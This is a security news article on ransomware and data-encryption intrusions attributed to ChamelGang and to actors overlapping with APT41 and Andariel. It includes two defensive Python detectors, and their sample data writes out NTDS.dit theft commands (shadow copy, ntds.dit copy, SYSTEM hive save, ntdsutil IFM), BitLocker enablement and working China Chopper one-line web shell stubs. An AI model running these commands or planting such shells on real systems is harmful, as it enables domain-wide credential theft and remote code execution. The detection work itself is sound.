Hackers Attack Global Infrastructure with Ransomware

Threat actors with suspected ties to China and North Korea have been linked to ransomware and data-encryption attacks on government and critical infrastructure organizations worldwide between 2021 and 2023.

The activity falls into two distinct clusters. One is attributed to ChamelGang (aka CamoFei); the other overlaps with activity previously attributed to Chinese and North Korean state-sponsored groups.

ChamelGang’s attacks include incidents at the All India Institute of Medical Sciences (AIIMS) and the Presidency of Brazil in 2022 using CatB ransomware. They also targeted a government entity in East Asia and an aviation organization in the Indian subcontinent in 2023.

“Threat actors in cyber espionage are increasingly using ransomware as a final stage in their operations for financial gain, disruption, distraction, misattribution, or removal of evidence,” noted security researchers.

Ransomware attacks serve not only to sabotage but also to cover tracks by destroying artifacts that could alert defenders to their presence.

ChamelGang, first documented by Positive Technologies in 2021, is believed to be a China-nexus group with varied motivations including intelligence gathering, data theft, financial gain, denial-of-service (DoS) attacks, and information operations.

The group has a wide range of tools, including BeaconLoader, Cobalt Strike, backdoors like AukDoor and DoorMe, and CatB ransomware. The attribution of the Brazil and India attacks to CatB rests on overlaps in the ransom note, the format of the contact email address, the cryptocurrency wallet address, and the extension appended to encrypted files.

In the 2023 attacks, an updated version of BeaconLoader was used to deliver Cobalt Strike for reconnaissance and post-exploitation, including dropping additional tools and exfiltrating the NTDS.dit database file. NTDS.dit is the Active Directory database on a domain controller and holds the password hashes of every domain account, so stealing it (together with the SYSTEM registry hive needed to decrypt it) gives an attacker offline access to domain-wide credentials.

ChamelGang’s custom malware, including DoorMe and MGDrive (with a macOS variant called Gimmick), has also been linked to other Chinese threat groups like REF2924 and Storm Cloud, suggesting a “digital quartermaster supplying distinct operational groups with malware.”

The second cluster of intrusions abused legitimate encryption software, Jetico BestCrypt and Microsoft BitLocker, to encrypt victims' data in attacks spanning various industries in North America, South America, and Europe. As many as 37 organizations, predominantly in the U.S. manufacturing sector, are estimated to have been affected.
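Both clusters described above leave footprints in ordinary process-creation telemetry: the NTDS.dit theft in the ChamelGang intrusions, and the BitLocker and BestCrypt encryption in the second cluster. The following is an added detection example, not code from the page or from the researchers it cites. It runs a handful of behavioural rules over constructed Sysmon/4688-style process events (host, user, image, command line) and then correlates per host, flagging the usual NTDS.dit theft chain (shadow copy creation plus a copy of ntds.dit, or ntdsutil's IFM export) and attacker-driven encryption (manage-bde / Enable-BitLocker, or any BestCrypt binary). The sample events and the "bestcrypt" image-name match are assumptions for illustration; the page does not state which commands the intruders ran.

```python
"""Flag NTDS.dit theft and attacker-driven disk encryption in process-creation telemetry.

Added example: rule set and sample events are constructed for illustration and are not
taken from the intrusions described in the article.
"""
import re
from collections import defaultdict

# Each rule: (name, severity, regex applied to "<image> <cmdline>" lower-cased).
RULES = [
    # ntdsutil "ifm" / "create full" exports a consistent copy of the AD database.
    ("ntdsutil_ifm", "high",
     re.compile(r"ntdsutil.*\b(ifm|create full|ac i ntds)\b")),
    # ntds.dit is locked on a live DC, so attackers snapshot the volume first.
    ("shadow_copy_create", "medium",
     re.compile(r"(vssadmin(\.exe)?\s+create\s+shadow"
                r"|wmic(\.exe)?\s+shadowcopy\s+call\s+create|diskshadow)")),
    # Any copy/export tool whose command line names ntds.dit.
    ("ntds_dit_copy", "high",
     re.compile(r"(copy|xcopy|robocopy|esentutl|\bcp\b).*ntds\.dit")),
    # SYSTEM hive holds the boot key needed to decrypt the hashes in ntds.dit.
    ("system_hive_save", "medium",
     re.compile(r"reg(\.exe)?\s+save\s+hklm\\system")),
    # BitLocker being switched on, or a new key protector added, from the command line.
    ("bitlocker_enable", "high",
     re.compile(r"(manage-bde(\.exe)?\s+-on\b|enable-bitlocker"
                r"|manage-bde(\.exe)?\s+-protectors\s+-add)")),
    # Assumption: any Jetico BestCrypt binary is named with "bestcrypt".
    ("bestcrypt_exec", "medium", re.compile(r"bestcrypt")),
]

# Constructed sample telemetry: (host, user, image, command line).
SAMPLE_EVENTS = [
    ("DC01", "CORP\\svc_backup", "C:\\Windows\\System32\\vssadmin.exe",
     "vssadmin create shadow /for=C:"),
    ("DC01", "CORP\\svc_backup", "C:\\Windows\\System32\\cmd.exe",
     "cmd /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1"
     "\\Windows\\NTDS\\ntds.dit C:\\temp\\n.dit"),
    ("DC01", "CORP\\svc_backup", "C:\\Windows\\System32\\reg.exe",
     "reg save HKLM\\SYSTEM C:\\temp\\sys.hiv"),
    ("FS03", "CORP\\jdoe", "C:\\Windows\\System32\\manage-bde.exe",
     "manage-bde -on D: -RecoveryPassword -UsedSpaceOnly"),
    ("WS12", "CORP\\asmith", "C:\\Windows\\System32\\notepad.exe",
     "notepad.exe report.txt"),
    ("DC02", "CORP\\admin", "C:\\Windows\\System32\\ntdsutil.exe",
     'ntdsutil "ac i ntds" "ifm" "create full C:\\temp\\ifm" q q'),
]


def match_rules(image, cmdline):
    """Return [(rule_name, severity), ...] for every rule the event triggers."""
    text = f"{image} {cmdline}".lower()
    return [(name, sev) for name, sev, rx in RULES if rx.search(text)]


def analyze(events):
    """Return (per-event findings, per-host correlated chains)."""
    per_host = defaultdict(set)
    findings = []
    for host, user, image, cmdline in events:
        for name, sev in match_rules(image, cmdline):
            findings.append({"host": host, "user": user, "rule": name,
                             "severity": sev, "cmdline": cmdline})
            per_host[host].add(name)

    chains = []
    for host, names in per_host.items():
        # Credential theft: IFM export, or snapshot followed by a copy of ntds.dit.
        if "ntdsutil_ifm" in names or {"shadow_copy_create", "ntds_dit_copy"} <= names:
            chains.append({"host": host, "chain": "ad_database_theft",
                           "rules": sorted(names)})
        # Data encryption with legitimate tooling rather than custom ransomware.
        if names & {"bitlocker_enable", "bestcrypt_exec"}:
            chains.append({"host": host, "chain": "attacker_driven_encryption",
                           "rules": sorted(names)})
    return findings, chains


if __name__ == "__main__":
    found, correlated = analyze(SAMPLE_EVENTS)
    for f in found:
        print(f"[{f['severity']:<6}] {f['host']} {f['user']}: {f['rule']} <- {f['cmdline']}")
    for c in correlated:
        print(f"CHAIN {c['chain']} on {c['host']} via {', '.join(c['rules'])}")
```

In production the shadow-copy and ntds.dit rules should be scoped to domain controllers and allow-listed for scheduled backup jobs, and the BitLocker rule should exclude your own provisioning accounts and deployment tooling; otherwise the chain logic, not the individual matches, is what keeps the alert volume tolerable.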

The tactics observed are consistent with those attributed to the Chinese hacking group APT41 and the North Korean actor Andariel, identified by the presence of tools like the China Chopper web shell and the DTrack backdoor.
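China Chopper, named above as one of the attribution clues, is worth a closer look from the defender's side because its server half is tiny: a one-line ASPX or PHP file that simply eval()s whatever arrives in a POST parameter, with all logic in the attacker's client. The following is an added example, not code from the page or from the researchers it cites. It scans constructed web-root file contents for the widely published China Chopper server stubs and also recognises the "->|" ... "|<-" framing the shell wraps around command output. The sample file names and contents are constructed for illustration; nothing on the page identifies the actual files found in these intrusions.

```python
"""Scan web-root files for China Chopper-style one-line web shells.

Added example: file contents below are constructed samples, not artifacts from the
intrusions described in the article.
"""
import re

# Server-side stub patterns matching the published China Chopper variants. They are
# case-insensitive and tolerant of whitespace so trivial reformatting does not evade them.
SHELL_PATTERNS = {
    # ASPX/JScript: eval(Request.Item["<param>"], "unsafe")
    "aspx_jscript_eval": re.compile(
        r'eval\s*\(\s*request\.item\s*\[\s*["\'][^"\']+["\']\s*\]\s*,\s*["\']unsafe["\']',
        re.I),
    # PHP: @eval($_POST['<param>'])
    "php_eval_post": re.compile(
        r'@?\s*eval\s*\(\s*\$_(post|request|get)\s*\[\s*["\']?[^\]]+["\']?\s*\]\s*\)',
        re.I),
    # PHP: eval(base64_decode($_POST[<param>])) as used by later client versions
    "php_eval_base64_post": re.compile(
        r'eval\s*\(\s*base64_decode\s*\(\s*\$_(post|request|get)\s*\[', re.I),
}

# Constructed sample web root: path -> file content.
SAMPLE_FILES = {
    "wwwroot/help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "htdocs/img/cache.php": "<?php @eval($_POST['cmd']); ?>",
    "htdocs/index.php": "<?php echo 'hello'; ?>",
    "wwwroot/Default.aspx": '<%@ Page Language="C#" %><html><body>ok</body></html>',
    "htdocs/lib/x.php": "<?php eval(base64_decode($_POST['z0'])); ?>",
}


def scan_content(content):
    """Return the names of every shell pattern found in one file's content."""
    return [name for name, rx in SHELL_PATTERNS.items() if rx.search(content)]


def scan_tree(files):
    """Return {path: [pattern names]} for files that match at least one pattern."""
    hits = {}
    for path, content in files.items():
        matched = scan_content(content)
        if matched:
            hits[path] = matched
    return hits


def looks_like_chopper_response(body):
    """True if an HTTP response body carries China Chopper's ->| ... |<- framing."""
    text = body.strip()
    return text.startswith("->|") and text.endswith("|<-")


if __name__ == "__main__":
    for path, names in scan_tree(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(names)}")
    print(looks_like_chopper_response("->|uid=0(root)\n|<-"))
```

Run this against a copy of the web root, not the live one, and treat any hit on a file whose modification time sits inside the incident window as a priority. The response-framing check is the network-side complement: a proxy or WAF log with bodies beginning "->|" on a POST to a file that should never execute input is the same finding seen from the wire.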

The malicious artifacts used in this second cluster were not recovered, most likely because of visibility limitations in the affected environments, so the attribution rests on the overlapping tactics and tooling rather than on the artifacts themselves.

These activities could be part of a broader cybercriminal scheme, as nation-state actors sometimes engage in financially motivated attacks.

“Cyber espionage operations disguised as ransomware activities allow adversarial countries to claim plausible deniability by attributing actions to independent cybercriminal actors rather than state-sponsored entities,” the researchers said.

“The use of ransomware by cyber espionage threat groups blurs the lines between cybercrime and cyber espionage, providing adversaries with strategic and operational advantages.”

To defend against ransomware from state-sponsored actors, organizations should maintain regular, offline or immutable backups and test restoring from them; enforce multi-factor authentication, especially on remote access and privileged accounts; and segment networks so that a foothold on a workstation does not give direct reach to domain controllers and backup infrastructure. Keeping software and systems patched closes the vulnerabilities used for initial access.

Advanced threat detection and response tooling further improves the ability to catch intrusions of this kind, but only if it watches for the specific behaviours seen here: access to or copies of NTDS.dit, unexpected enablement of BitLocker or installation of third-party disk-encryption software such as BestCrypt, and web shell activity on internet-facing servers. Because the second cluster encrypted data with legitimate tools rather than custom ransomware, signature-based detection alone is unlikely to catch it.